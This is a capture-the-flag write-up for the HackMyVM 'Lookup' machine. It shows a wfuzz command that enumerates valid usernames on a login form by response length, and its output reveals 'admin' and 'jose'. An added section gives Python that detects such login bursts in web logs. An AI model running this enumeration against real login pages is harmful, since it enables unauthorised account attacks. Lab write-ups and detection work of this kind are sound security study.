Target machine: https://hackmyvm.eu/machines/machine.php?vm=Lookup
Visiting the IP directly returns an error; the domain lookup.hmv has to be added to /etc/hosts first. After that, the home page shows a login form.
Directory scanning turned up no sensitive files and no obvious vulnerabilities, and SQL injection did not work either, so the only remaining option is brute force, starting with enumerating a valid username. Pay attention to wfuzz's syntax here: the required headers have to be supplied with several separate -H flags. The --hh 74 flag hides every response that is 74 characters long, so the only usernames listed below are the two that produce a different (62-character) response.
└─$ wfuzz -c -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -H 'Host: lookup.hmv' -H 'Origin: http://lookup.hmv' -H 'Referer: http://lookup.hmv' -d "username=FUZZ&password=123456" --hh 74 http://lookup.hmv/login.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://lookup.hmv/login.php
Total requests: 10177
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000086: 200 0 L 8 W 62 Ch "admin"
000004897: 200 0 L 8 W 62 Ch "jose"
Total time: 0
Processed Requests: 10177
Filtered Requests: 10175
Requests/sec.: 0
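From the defender's side, this enumeration leaves a recognisable trace: one source POSTing to /login.php far faster than a person would, with responses of two distinct lengths. The Python below is an added example (not part of the original writeup) that parses constructed Apache combined-format log lines and flags such bursts per source IP; the sample lines, IPs, timestamps and the Wfuzz user-agent string are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample in Apache combined log format (not captured from the target).
# 10.0.0.5 is a fuzzer hitting /login.php; 10.0.0.9 is one ordinary login attempt.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "POST /login.php HTTP/1.1" 200 74 "http://lookup.hmv" "Wfuzz/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "POST /login.php HTTP/1.1" 200 74 "http://lookup.hmv" "Wfuzz/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:02 +0000] "POST /login.php HTTP/1.1" 200 62 "http://lookup.hmv" "Wfuzz/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:02 +0000] "POST /login.php HTTP/1.1" 200 74 "http://lookup.hmv" "Wfuzz/3.1.0"
10.0.0.5 - - [10/Jan/2024:12:00:03 +0000] "POST /login.php HTTP/1.1" 200 62 "http://lookup.hmv" "Wfuzz/3.1.0"
10.0.0.9 - - [10/Jan/2024:12:03:00 +0000] "POST /login.php HTTP/1.1" 200 74 "http://lookup.hmv" "Mozilla/5.0"
"""

# One combined-format line: ip, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec

def find_login_bursts(log_text, path="/login.php", window=timedelta(seconds=60), threshold=4):
    """Return {ip: (peak POSTs to `path` inside one `window`, sorted distinct response sizes)}
    for sources whose peak exceeds `threshold`; a 62-vs-74 size split is what --hh keys on."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            per_ip[rec["ip"]].append((rec["ts"], rec["size"]))
    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        peak, start = 0, 0
        for end, (ts, _) in enumerate(events):   # sliding window over sorted timestamps
            while ts - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = (peak, sorted({size for _, size in events}))
    return flagged
```

Tune `window` and `threshold` to the site's normal login rate; the distinct-size list is the part worth alerting on, since a login page that answers valid and invalid usernames with different lengths is what makes this enumeration possible in the first place.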